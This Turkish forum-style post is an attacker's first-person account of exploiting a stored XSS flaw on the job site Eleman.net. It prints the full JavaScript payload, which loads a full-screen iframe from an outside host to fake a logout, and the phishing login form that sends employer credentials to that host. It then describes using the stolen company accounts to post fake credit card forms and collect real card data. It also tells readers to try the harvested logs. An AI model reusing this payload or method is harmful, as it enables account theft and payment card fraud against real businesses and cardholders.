Eleman.net sitesi, 2005 senesinde kurulmuş olup kurulduğu zamandan bugüne bir çok büyük işletme sahibinin tercihi olmuş ve olmayı da günümüzde halen sürdürmektedir.
Bu site ile beraber büyük ve kurumsal firmalar ile doğrudan iletişime ve temasa geçebilmemiz için açık kapı oluyor yani burada bulabileceğimiz bir açık tüm bu firmalar için sorun teşkil etmektedir.
Soruna konu olabilecek bilgiler şunlardır;
Şimdi yaptığımız işleme gelelim,
Başvuru için CV doldurduğumda bütün kullanıcı girdilerine html kodu girip "Stored XSS" açığına sebep olmaya çalıştım sadece tek bir yerde çalıştı ve gereksiz boş bir yerde açığı buldum.
Açığın olduğu yeri inceledim firma paneli kısmından başvuru yaptım ve bir kaç sorun ile karşılaştım.
1) Kodun çalışması için CV'nin özellikle incelenmesi lazım yani "detayları göster" butonuna basılması lazımdı.
2) PHPSESSID httponly olarak ayarlanmamıştı fakat farklı ip üzerinden giriş yapıldığında çerez ölüyordu. Hesaba giriyor ama F5 atınca 2 tarayıcıdan da logout oluyordu.
Bu 2 sorunu göz önünde bulundurup kolları sıvayıp kodumu yazdım.
JavaScript:
function checkCookie() {
var bqxsec = getCookie("bqxsec");
if (!bqxsec) {
var iframe = document.createElement("iframe");
iframe.src = "https://extacygodz.online/bqxsec/eleman.html";
iframe.style = "position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;";
document.body.appendChild(iframe);
setCookie("bqxsec", "true", 1);
}
}
function getCookie(name) {
var cookieName = name + "=";
var decodedCookie = decodeURIComponent(document.cookie);
var cookieArray = decodedCookie.split(';');
for (var i = 0; i < cookieArray.length; i++) {
var cookie = cookieArray[i];
while (cookie.charAt(0) === ' ') {
cookie = cookie.substring(1);
}
if (cookie.indexOf(cookieName) === 0) {
return cookie.substring(cookieName.length, cookie.length);
}
}
return null;
}
function setCookie(name, value, days) {
var expires = "";
if (days) {
var date = new Date();
date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000));
expires = "; expires=" + date.toUTCString();
}
document.cookie = name + "=" + value + expires + "; path=/";
}
window.onload = checkCookie;
Kod ne işe mi yarıyor?
CV'de detay butonuna basıldığında "bqxsec" isimli çerezi kontrol eder eğer yok ise uzak sunucudaki eleman.html sayfasının iframe'ini çeker ve kullanıcı logout olduğunu sanıp geri login olur.
HTML:
<form id="login_form" class="login-form" action="https://extacygodz.online/bqxsec/bqxsec.php" method="post" name="giris">
<div class="c-form-group u-gap-bottom-small">
<input type="email" value="" placeholder="E-Posta Adresiniz" id="fi_eposta" name="T_eposta" tabindex="1" maxlength="100" class="c-form-control c-form-control--large" />
</div>
<div class="c-form-group u-gap-bottom-xsmall">
<input type="password" value="" placeholder="Şifreniz" name="T_sifre" id="fi_pass" maxlength="25" tabindex="2" class="c-form-control c-form-control--large" />
</div>
<button type="submit" name="T_giris" tabindex="3" value="Giriş Yap" class="c-button c-button--primary c-button--full">Giriş Yap</button>
</form>
Kod, gelen kullanıcı bilgilerini bqxsec.php'ye kaydediyor ve oradan post isteklerden gelen bilgileri de ayrıştırıp bqxweb.txt'ye kaydediyordu.
Hesaplar geldi birikti yönetici hesaplarında bile 2fac yoktu ama firma girişi = yönetim paneli değildi fakat amacım da o değildi kart bilgilerine erişmekti
Besin zincirleri, firmalar, bankalar vs hesabına erişebildiysem neden kredi kartına erişemeyeyim dedim?
Şöyle bir sayfa hazırladım normalde aşırı pahalı ilan fiyatları eskiden 47K idi daha fazla bile olmuş olabilir bu ilaç gibi geliyordu ve insanlar hiç tereddüt etmeden su parası gibi geliyor alıyordu. hiç amkkk bu firma şu kadara mı kaldı vs demeyin türkiye'de yaşıyoruz.
Sahte bir kredi kartı formu hazırladım ve koydum. kod benim siteme yönlendiriyordu satın al diyince çünkü iframe içine giren bilgiler sorun yaratıyordu güvenilir değil vs. bende farklı bir domaine yönlendirdim
Edit: bazı operasyon çocukları kart sahiplerine ve firmaların yetkililerine ulaşıp konuyu atmış sorun yaşanmasın diye kapattım.
ve loga düşen kartlar ve bunun gibi fazlası business, yabancı vs yüksek statülü kartlar artık elimdeydi fakat bir güncelleme oldu açığı farkedip tüm firma sahibi hesaplarına bloke koydular. şuan ki güncelleme ile sadece telefon numarasına yeni kod alınıp giriş yapabiliyorsunuz hesaplara. loglarınızdan çıkarıp deneyebilirsiniz
bunu biraz daha devam ettirseydim 3D para aklamaya kadar yolu vardı fakat tanrı yapabileceklerimi bildiğinden bana izin vermedi
basit bir php açığından olay nerelere geldi gördüğünüz üzere en büyük firmalara iğne deliği kadar küçük açıklar ile hackleyebiliyorsunuz
Detaylı cv sorununu da şöyle çözmüştüm; yapay zeka ile güzel bir özgeçmiş oluşturup googledan kurumsal fotoğraf indirip ne olur olmaz da soyad kısmına da (CV görüntüleyin) yazıyordum günde onlarca log geliyordu başvurduğum firmanın bilgileri elime düşüyordu.
ilk firma hesaplarından kredi kartlarına kadar gitti.
